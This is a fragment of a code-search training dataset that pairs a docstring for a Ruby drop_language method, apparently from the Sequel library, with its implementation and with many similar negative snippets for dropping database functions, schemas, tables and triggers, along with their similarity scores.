"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def highlight(code, lang, options = T.unsafe(nil), format = T.unsafe(nil)); end",
"def script(name, &block)\n add Config::Patterns::Script do |p|\n # NOTE: this is a pretty weak deprecation system. Improve it as\n # as needed.\n deprecate \"The 'script' has been deprecated. Use 'bash' instead.\"\n p.name = name\n p.code_exec = \"sh\"\n yield p if block_given?\n end\n end",
"def render_code(code)\n render_block(Pygments.highlight(code, formatter: 'terminal256', lexer: 'ruby', options: {style: 'bw'}))\nend"
] |
[
"0.6247023",
"0.5933642",
"0.5895321",
"0.5683034",
"0.56672835",
"0.5577568",
"0.5519545",
"0.5435928",
"0.54297894",
"0.5415428",
"0.5415428",
"0.5401936",
"0.5354501",
"0.5351753",
"0.5335078",
"0.5329581",
"0.53250164",
"0.530187",
"0.5296145",
"0.5272397",
"0.5240748",
"0.5238456",
"0.5236814",
"0.52355003",
"0.52274466",
"0.5224497",
"0.52169776",
"0.5213871",
"0.52077895",
"0.52012944",
"0.51960295",
"0.5188098",
"0.5182651",
"0.5182651",
"0.5182651",
"0.5182651",
"0.5182651",
"0.5182651",
"0.5182651",
"0.51810074",
"0.51684",
"0.5163857",
"0.51602304",
"0.51554",
"0.5148827",
"0.51468456",
"0.51443213",
"0.51361763",
"0.51297027",
"0.51297027",
"0.51251334",
"0.51200986",
"0.5110827",
"0.50942147",
"0.5070847",
"0.50705063",
"0.5066472",
"0.5056498",
"0.50480825",
"0.5040144",
"0.5034228",
"0.503145",
"0.5028889",
"0.5028316",
"0.5020059",
"0.5012561",
"0.5007891",
"0.49988532",
"0.49942797",
"0.49834087",
"0.49709913",
"0.49709743",
"0.49619603",
"0.49572042",
"0.49494028",
"0.49436203",
"0.49436203",
"0.49426752",
"0.4933484",
"0.49314225",
"0.49188414",
"0.49010983",
"0.49010983",
"0.48957765",
"0.4887612",
"0.48849696",
"0.48837686",
"0.48836467",
"0.4878078",
"0.48743337",
"0.4868984",
"0.48681423",
"0.48675817",
"0.48667786",
"0.48646817",
"0.4862853",
"0.4859392",
"0.4858145",
"0.48554966",
"0.48551646"
] |
0.66809785
|
0
|
Drops the function from the database. Arguments: name :: name of the function to drop opts :: options hash: :args :: The arguments for the function. See create_function_sql. :cascade :: Drop other objects depending on this function. :if_exists :: Don't raise an error if the function doesn't exist.
|
def drop_function(name, opts=OPTS)
self << drop_function_sql(name, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def drop_function(function_name, options = {})\n function_name = full_function_name(function_name, options)\n\n execute \"DROP FUNCTION #{function_name}\"\n end",
"def drop_function(name, custom_drop_statement = nil)\n Scenic.database.drop_function(name, custom_drop_statement)\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def drop_function(function_name, options)\n\n end",
"def remove_udf(udf_name, options = nil)\n policy = create_policy(options, Policy, default_info_policy)\n\n str_cmd = \"udf-remove:filename=#{udf_name};\"\n\n # Send command to one node. That node will distribute it to other nodes.\n # Send UDF to one node. That node will distribute the UDF to other nodes.\n response_map = @cluster.request_info(policy, str_cmd)\n _, response = response_map.first\n\n if response == \"ok\"\n UdfRemoveTask.new(@cluster, udf_name)\n else\n raise Aerospike::Exceptions::Aerospike.new(Aerospike::ResultCode::SERVER_ERROR, response)\n end\n end",
"def drop\n Statements::DropFunction.new(context: self)\n end",
"def remove_stored_function(function_name)\n return false unless self[SYSTEM_JS_COLLECTION].find_one({\"_id\" => function_name})\n self[SYSTEM_JS_COLLECTION].remove({\"_id\" => function_name}, :w => 1)\n end",
"def remove(name)\n if hook = by_name(name)\n hook.destroy!\n end\n end",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def remove_by_name(name)\n fw = get_by_name(name)\n if (fw != nil)\n return remove(fw)\n end \n end",
"def delete_hook(name, hook_function_name)\n @hooks[name] ||= {}\n @hooks[name].delete(hook_function_name)\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def delete(sql, name = nil)\n delete_sql(sql, name)\n end",
"def drop\n database.command(:drop => name)\n rescue Error::OperationFailure => ex\n raise ex unless ex.message =~ /ns not found/\n false\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def drop_table(table_name, **options)\n schema_cache.clear_data_source_cache!(table_name.to_s)\n execute \"DROP#{' TEMPORARY' if options[:temporary]} TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}\"\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def remove_foreign_key(table_name, *args)\n if self.adapter_name == \"PostgreSQL\" or self.adapter_name == \"MySQL\"\n options = args.extract_options!\n name = if options[:name]\n options[:name]\n else\n columns = args.first\n index_name(table_name, :column => Array(columns))\n end\n\n execute \"ALTER TABLE #{quote_table_name(table_name)} DROP FOREIGN KEY #{quote_column_name(name)}\"\n end\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def delete(sql, name = nil) end",
"def drop(name)\n tuples = primary.lookup_vals(name)\n return delete(tuples).size > 0\n end",
"def delete_sql(sql, name = nil)\n update_sql(sql, name)\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def drop_view(name, **kwargs)\n kwargs[:sqlite3] = !!(adapter_name =~ /sqlite/i)\n\n execute build_drop_view_query(name, **kwargs)\n end",
"def remove_by_name(name)\n p = get_by_name(name)\n if (p != nil)\n return remove(p)\n end \n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def drop_subscription(name, ifexists = false)\n typed_exec(\"DROP SUBSCRIPTION#{\" IF EXISTS\" if ifexists} #{connection.quote_ident(name)}\")\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def drop_event_trigger(name, options = {})\n sql = 'DROP EVENT TRIGGER '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_generic(name)\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def delete(name)\n @driver.deleteRule([name])\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def function(name, *args)\n SQL::Function.new(function_name(name), *args)\n end",
"def destroy\n @client.execute_udf(@key, @PACKAGE_NAME, 'destroy', [@bin_name], @policy)\n end",
"def remove(name)\n sudo \"rm -rf #{god_confd}/#{name}\"\n end",
"def remove\n return unless confirm_command\n\n args.each do |name|\n messages = nil\n if name.start_with? \"HEROKU_POSTGRESQL_\"\n name = name.chomp(\"_URL\").freeze\n end\n action(\"Removing #{name} on #{app}\") do\n messages = addon_run { heroku.uninstall_addon(app, name, :confirm => app) }\n end\n display(messages[:attachment]) if messages[:attachment]\n display(messages[:message]) if messages[:message]\n end\n end",
"def update_function(name, args)\n version = args[:version]\n sql_definition = args[:sql_definition]\n revert_to_version = args[:revert_to_version]\n\n if version.nil? && sql_definition.nil?\n raise(\n ArgumentError,\n \"version or sql_definition must be specified\",\n )\n end\n\n sql_definition = sql_definition.strip_heredoc if sql_definition\n sql_definition ||= Fx::Definition.new(\n name: name,\n version: version,\n ).to_sql\n\n Fx.database.update_function(name, sql_definition)\n end",
"def drop_sequence(name)\n execute drop_sequence_sql(name)\n end",
"def drop_language(name, opts=OPTS)\n self << drop_language_sql(name, opts)\n end",
"def drop_sequence(*args)\n options = args.extract_options!\n args.flatten!\n\n sql = 'DROP SEQUENCE '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << Array.wrap(args).collect { |s| quote_sequence(s) }.join(', ')\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def exec_delete(sql, name, binds)\n execute(sql, name, binds)\n end",
"def delete_hook(event_name, hook_name)\n @hooks[event_name] ||= []\n deleted_callable = nil\n\n @hooks[event_name].delete_if do |current_hook_name, callable|\n if current_hook_name == hook_name\n deleted_callable = callable\n true\n else\n false\n end\n end\n deleted_callable\n end",
"def drop_sequence(sequence_name, options = {})\n SchemaMonkey::Middleware::Migration::DropSequence.start(connection: self, sequence_name: sequence_name, sequence_options: options) do |env|\n sequence_name = env.sequence_name\n options = env.sequence_options\n sql = \"DROP SEQUENCE\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(sequence_name)}\"\n execute sql\n end\n end",
"def remove_check(table_name, options)\n name = options.fetch(:name) { raise 'remove_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n DROP CONSTRAINT #{quote_column_name(name)}\n SQL\n end",
"def exec_delete(sql, name = nil, binds = []) #:nodoc:\r\n log(sql, \"delete\", binds) { query(sql, binds) }\r\n end",
"def remove!\n zombie_check\n self.class.remove(@name)\n end",
"def function(name, *args)\n SQL::Function.new(name, *args)\n end",
"def remove name\n delete(name)\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def delete(name); end",
"def delete(name); end",
"def drop_table\n db.drop_table(table_name)\n end",
"def destroy(*args)\n if self.gr_can_destroy?\n unless new_record?\n connection.delete(\n \"DELETE FROM #{self.class.quoted_table_name} \" +\n \"WHERE #{connection.quote_column_name(self.class.primary_key)} = #{quoted_id}\",\n \"#{self.class.name} Destroy\"\n )\n end\n @destroyed = true\n freeze\n else\n eval_violation(:destroy_access)\n end\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete(name)\n\n end",
"def destroy\n dbf.destroy\n rescue MissingSource\n ensure\n freeze\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def drop_view(name)\n execute(\"DROP VIEW #{name}\")\n end",
"def drop_database(db_name)\n check_return_code(PureHailDB.ib_database_drop(db_name))\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def drop_trigger(table_name, trigger_name, options = {})\n SchemaMonkey::Middleware::Migration::CreateTrigger.start(connection: self, table_name: table_name, trigger_name: trigger_name, options: options) do |env|\n table_name = env.table_name\n trigger_name = env.trigger_name\n options = env.options\n\n sql = \"DROP TRIGGER\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(trigger_name)} ON #{quote_table_name(table_name)}\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def destroy_database(name)\n database = ::MySQL::Database.find_by_name(name)\n return false if database.nil?\n !!database.destroy\n end",
"def drop _args\n \"drop _args;\" \n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def drop\n ensure_service!\n service.drop_database instance_id, database_id\n true\n end",
"def remove_plugin(name)\n @data[\"installed\"].delete(name)\n save!\n end",
"def destroy\n # delete object from the DB\n # DB.execute(\"DELETE .....\")\n end",
"def to_drop_database_sql(db)\n db.send(:drop_database_sql, self.name, {})\n end",
"def drop_trigger(table, name, opts=OPTS)\n self << drop_trigger_sql(table, name, opts)\n end",
"def delete\n validate_presence_of :name\n wrapper.delete_tag(@name) || raise(OperationFailed)\n end",
"def remove_trigger(table, name, options={})\n options[:name] = name\n execute \"DROP TRIGGER #{trigger_name(table, [], options).to_sql_name} ON #{table} #{cascade_or_restrict(options[:deep])};\"\n end",
"def remove_trigger(table, name, options={})\n options[:name] = name\n execute \"DROP TRIGGER #{trigger_name(table, [], options).to_sql_name} ON #{table} #{cascade_or_restrict(options[:deep])};\"\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def down\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS add_animal;\nSQL\n\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS update_animal;\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS all_animals\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_species\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_name\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_tank\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_habitat\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_birthday\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS create_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS update_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS delete_animal\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_animal\nSQL\nexecute <<-SQL\n DROP FUNCTION IF EXISTS get_animal_count\nSQL\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::DropView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n options = env.options\n materialized = options[:materialized] ? 'MATERIALIZED' : ''\n sql = \"DROP #{materialized} VIEW\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def exec_delete(sql, name = 'SQL', binds = [])\n log(sql, name, binds) do\n result = without_prepared_statement?(binds) ? exec_no_cache(sql) :\n exec_cache(sql, binds)\n affected = result.cmd_tuples\n result.clear\n affected\n end\n end",
"def remove(name)\n path = repository_path(name)\n File.exists?(path) && FileUtils.rm_rf(path) && true\n end",
"def delete_user (db, user_name)\n\tdb.execute(\"DELETE FROM users WHERE user_name=?\", [user_name])\nend",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def exec__psql_db_batch__drop_owned_current_user *args\n psql_db = psql_db__sample_example\n drop_all_batch = psql_db_batch__db_queries_method psql_db, :db_queries__drop_owned_current_user\n batch = drop_all_batch\n batch_commands batch\n end",
"def delete(name)\n File.delete(path(name))\n end"
] |
[
"0.79073864",
"0.786958",
"0.7367995",
"0.7303213",
"0.71446484",
"0.71446484",
"0.7094034",
"0.70206577",
"0.5780303",
"0.5701886",
"0.56950027",
"0.56453824",
"0.5614687",
"0.5581923",
"0.5575382",
"0.55501544",
"0.54821366",
"0.54505163",
"0.54489833",
"0.54471713",
"0.5421345",
"0.5401057",
"0.53991765",
"0.53938234",
"0.53880036",
"0.5383386",
"0.5336844",
"0.5329802",
"0.53253376",
"0.53226584",
"0.52973557",
"0.52648395",
"0.52591866",
"0.52402186",
"0.5193811",
"0.51908237",
"0.5186675",
"0.5166292",
"0.5164138",
"0.5154705",
"0.5149008",
"0.514873",
"0.5148249",
"0.5136171",
"0.51352465",
"0.5132804",
"0.5115556",
"0.509145",
"0.5090269",
"0.50896484",
"0.5086773",
"0.5078627",
"0.50775003",
"0.50772554",
"0.50648063",
"0.506441",
"0.50603926",
"0.50597364",
"0.50452155",
"0.5044218",
"0.5041983",
"0.5039609",
"0.50367254",
"0.502629",
"0.502629",
"0.5025144",
"0.500955",
"0.500909",
"0.50070864",
"0.50070864",
"0.5005969",
"0.49926084",
"0.49745518",
"0.49742237",
"0.49699685",
"0.49699682",
"0.49674943",
"0.4964015",
"0.4948186",
"0.49475643",
"0.49428996",
"0.49428996",
"0.49386415",
"0.49374786",
"0.49360073",
"0.4927944",
"0.4923276",
"0.49194747",
"0.49194747",
"0.49184203",
"0.49170375",
"0.49125722",
"0.4898871",
"0.48841554",
"0.4879808",
"0.4878988",
"0.48774666",
"0.48694623",
"0.48687428",
"0.48515138"
] |
0.74234545
|
2
|
Drops a procedural language from the database. Arguments: name :: name of the procedural language to drop opts :: options hash: :cascade :: Drop other objects depending on this function. :if_exists :: Don't raise an error if the function doesn't exist.
|
def drop_language(name, opts=OPTS)
self << drop_language_sql(name, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def drop_language_sql(name, opts=OPTS)\n \"DROP LANGUAGE#{' IF EXISTS' if opts[:if_exists]} #{name}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def drop_proc(name, columns=[], cascade=false)\n execute \"DROP FUNCTION #{name.to_sql_name}(#{columns.collect {|column| column}.join(\", \")}) #{cascade_or_restrict(cascade)};\"\n end",
"def remove(name)\n if hook = by_name(name)\n hook.destroy!\n end\n end",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def drop_function(function_name, params, options = {})\n SchemaMonkey::Middleware::Migration::CreateFunction.start(connection: self, function_name: function_name, params: params, options: options) do |env|\n function_name = env.function_name\n params = env.params\n options = env.options\n function_type = (options[:function_type] || :function).to_s.upcase\n\n sql = \"DROP #{function_type}\"\n sql += \" IF EXISTS\" if options[:if_exists]\n sql += \" #{function_name}(#{params})\"\n sql += \" CASCADE\" if options[:cascade]\n\n execute sql\n end\n end",
"def delete(sql, name = nil)\n delete_sql(sql, name)\n end",
"def drop_function(name, opts=OPTS)\n self << drop_function_sql(name, opts)\n end",
"def delete(name)\n @driver.deleteRule([name])\n end",
"def delete_sql(sql, name = nil)\n update_sql(sql, name)\n end",
"def drop_function(name, custom_drop_statement = nil)\n Scenic.database.drop_function(name, custom_drop_statement)\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def delete(sql, name = nil) end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def drop_subscription(name, ifexists = false)\n typed_exec(\"DROP SUBSCRIPTION#{\" IF EXISTS\" if ifexists} #{connection.quote_ident(name)}\")\n end",
"def remove_plugin(name)\n @data[\"installed\"].delete(name)\n save!\n end",
"def delete_program_by_name(name)\n item = getProgramByName(name)\n item.destroy\nend",
"def drop_database(name)\n single_db_command(name, :dropDatabase => 1)\n end",
"def drop_function(function_name, options = {})\n function_name = full_function_name(function_name, options)\n\n execute \"DROP FUNCTION #{function_name}\"\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def destroy_db(options)\n info \"Dropped database '#{options[:name]}'\"\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def destroy\n @language_type.destroy\n\n head :no_content\n end",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def remove_by_name(name)\n fw = get_by_name(name)\n if (fw != nil)\n return remove(fw)\n end \n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def down\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS add_animal;\nSQL\n\nexecute <<-SQL\n\tDROP TRIGGER IF EXISTS update_animal;\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS all_animals\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_species\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_name\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_tank\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_habitat\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_by_birthday\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS create_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS update_animal\nSQL\n\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS delete_animal\nSQL\nexecute <<-SQL\n DROP PROCEDURE IF EXISTS get_animal\nSQL\nexecute <<-SQL\n DROP FUNCTION IF EXISTS get_animal_count\nSQL\n end",
"def drop_function(function_name, options)\n\n end",
"def remove(name)\n template = find(name)\n shell.rm_rf(template.path) if template\n end",
"def remove_sound(name)\n music = MSPhysics::Music.get_by_name(name)\n MSPhysics::Music.destroy(music) if music\n dict1 = Sketchup.active_model.attribute_dictionary('MSPhysics Sounds', false)\n dict1.delete_key(name.to_s) if dict1\n dict2 = Sketchup.active_model.attribute_dictionary('MSPhysics Sound Types', false)\n dict2.delete_key(name.to_s) if dict2\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def remove\n return unless confirm_command\n\n args.each do |name|\n messages = nil\n if name.start_with? \"HEROKU_POSTGRESQL_\"\n name = name.chomp(\"_URL\").freeze\n end\n action(\"Removing #{name} on #{app}\") do\n messages = addon_run { heroku.uninstall_addon(app, name, :confirm => app) }\n end\n display(messages[:attachment]) if messages[:attachment]\n display(messages[:message]) if messages[:message]\n end\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop(name)\n tuples = primary.lookup_vals(name)\n return delete(tuples).size > 0\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def destroy\n dbf.destroy\n rescue MissingSource\n ensure\n freeze\n end",
"def remove_language\n expression_language = ExpressionLanguage.find(params[:expression_language_id]) unless params[:expression_language_id].blank?\n @expression = expression_language.expression\n \n if !expression_language.blank?\n if expression_language.destroy\n # update related work for solr indexing\n work = @expression.work\n work.save\n end\n end\n \n render :partial => 'languages_form', :locals => { :expression => @expression }\n end",
"def drop_translated_table\n self.connection.drop_table translation_table_name\n end",
"def drop\n database.command(:drop => name)\n rescue Error::OperationFailure => ex\n raise ex unless ex.message =~ /ns not found/\n false\n end",
"def destroy\n @language_user.destroy\n end",
"def remove_technique(name)\n @techniques.delete(name)\n end",
"def remove_by_name(name)\n p = get_by_name(name)\n if (p != nil)\n return remove(p)\n end \n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def destroy\n @programming_language.destroy\n respond_to do |format|\n format.html { redirect_to programming_languages_url, notice: 'Programming language was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def drop_event_trigger(name, options = {})\n sql = 'DROP EVENT TRIGGER '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_generic(name)\n sql << ' CASCADE' if options[:cascade]\n execute(\"#{sql};\")\n end",
"def delete_hook(name, hook_function_name)\n @hooks[name] ||= {}\n @hooks[name].delete(hook_function_name)\n end",
"def delete(name); end",
"def delete(name); end",
"def destroy\n if @language[:default] ='true'\n Language.where(\"id != #{@language[:id]}\").first().update_attributes(:default => true)\n end\n if @language.destroy\n flash[:notice] = I18n.t('admin.languages.destroy.success', :name => @language.name)\n else\n flash[:notice] = I18n.t('admin.languages.destroy.failure', :name => @language.name)\n end\n\n redirect_to :action => :index\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def delete!\n StoredProcedures.delete(self.id) if self.id\n end",
"def drop_schema(name, opts = {})\n execute_ddl(drop_schema_sql(name, opts))\n end",
"def delete_layer(layer_name)\n @cascade.delete(layer_name)\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def remove name\n delete(name)\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def unload name\n raise \"Cannot unload: No such script #{name}\" unless @scripts.has_key? name\n\n @scripts[name].die if @scripts[name].respond_to? \"die\"\n\n @scripts[name].unregister_script\n @scripts[name].unregister_commands\n @scripts[name].unregister_events\n\n @scripts.delete name\n end",
"def exec_delete(sql, name, binds)\n execute(sql, name, binds)\n end",
"def delete(name)\n raise('wrong type: String required') unless name.is_a?(String)\n raise('wrong value: name must be valid') unless !name.nil? && !name.empty?\n\n @client.post({\n 'action' => 'del',\n 'object' => 'htpl',\n 'values' => name,\n }.to_json)\n end",
"def remove(name)\n sudo \"rm -rf #{god_confd}/#{name}\"\n end",
"def destroy\n @accountadmin_language = AccountadminLanguage.find(params[:id])\n @accountadmin_language.destroy\n\n unless @accountadmin_language.errors.empty?\n flash[:notice] = \"WARNING: Couldn't delete language because:\"\n @accountadmin_language.errors.full_messages.each { |m| flash[:notice] << \"<br/>\" << m }\n end\n\n respond_to do |format|\n format.html { redirect_to(accountadmin_languages_url) }\n format.xml { head :ok }\n end\n end",
"def remove(selector={})\n @db.remove_from_db(@name, selector)\n end",
"def exec_delete(sql, name, binds)\n exec_query(sql, name, binds)\n end",
"def delete_code(cheatsheet_db, language, delete_by, delete_this)\n cheatsheet_db.execute(\"DELETE FROM #{language} WHERE #{delete_by}=#{delete_this}\")\nend",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def drop\n Statements::DropFunction.new(context: self)\n end",
"def drop\n @db.drop_collection(@name)\n end",
"def delete(name)\n @ctx.delete(@path + name)\n end",
"def drop_schema(name, opts=OPTS)\n self << drop_schema_sql(name, opts)\n end",
"def delete(name)\r\n key = convert_key(name)\r\n return false unless has(key)\r\n @p.delete(key)\r\n true\r\n end",
